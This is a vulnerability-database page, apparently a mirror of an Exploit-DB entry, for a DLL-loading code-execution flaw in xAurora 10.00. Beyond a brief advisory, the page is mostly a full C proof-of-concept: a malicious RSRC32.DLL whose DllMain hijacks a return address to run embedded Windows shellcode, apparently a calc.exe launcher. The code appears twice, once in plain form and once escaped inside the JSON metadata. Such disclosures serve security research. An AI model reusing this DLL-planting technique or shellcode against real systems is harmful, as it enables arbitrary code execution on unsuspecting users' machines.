Search...

xAurora 10.00 - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability

2011-06-24T00:00:00

ID EDB-ID:35881
Type exploitdb
Reporter Zer0 Thunder
Modified 2011-06-24T00:00:00

Description

xAurora 10.00 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/48432/info

xAurora is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. 

*/

#include &lt;windows.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;


char shellcode[]="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
"\x2e\x65\x78\x65\x00";

int xAuroraPwnage()
{
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)shellcode;
MessageBox(0, "[+] xAurora Pwned By Zer0 Thunder !", "Not so Secured Browser", MB_OK);
return 0;

}  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  xAuroraPwnage();
  return 0;
}

JSON Vulners Source

Initial Source

{"id": "EDB-ID:35881", "type": "exploitdb", "bulletinFamily": "exploit", "title": "xAurora 10.00 - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability", "description": "xAurora 10.00 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability. Remote exploit for windows platform", "published": "2011-06-24T00:00:00", "modified": "2011-06-24T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://www.exploit-db.com/exploits/35881/", "reporter": "Zer0 Thunder", "references": [], "cvelist": [], "lastseen": "2016-02-04T02:12:51", "viewCount": 9, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2016-02-04T02:12:51", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-04T02:12:51", "rev": 2}, "vulnersScore": 0.5}, "sourceHref": "https://www.exploit-db.com/download/35881/", "sourceData": "source: http://www.securityfocus.com/bid/48432/info\r\n\r\nxAurora is prone to a vulnerability that lets attackers execute arbitrary code.\r\n\r\nAn attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. \r\n\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n\r\nchar shellcode[]=\"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\"\r\n\"\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\"\r\n\"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\"\r\n\"\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\"\r\n\"\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\"\r\n\"\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\"\r\n\"\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\"\r\n\"\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\"\r\n\"\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\"\r\n\"\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x6a\\x01\\x8d\\x85\\xb9\\x00\"\r\n\"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\"\r\n\"\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\"\r\n\"\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5\\x63\\x61\\x6c\\x63\"\r\n\"\\x2e\\x65\\x78\\x65\\x00\";\r\n\r\nint xAuroraPwnage()\r\n{\r\nint *ret;\r\nret=(int *)&ret+2;\r\n(*ret)=(int)shellcode;\r\nMessageBox(0, \"[+] xAurora Pwned By Zer0 Thunder !\", \"Not so Secured Browser\", MB_OK);\r\nreturn 0;\r\n\r\n} \r\nBOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)\r\n{\r\n xAuroraPwnage();\r\n return 0;\r\n}\r\n\r\n", "osvdbidlist": []}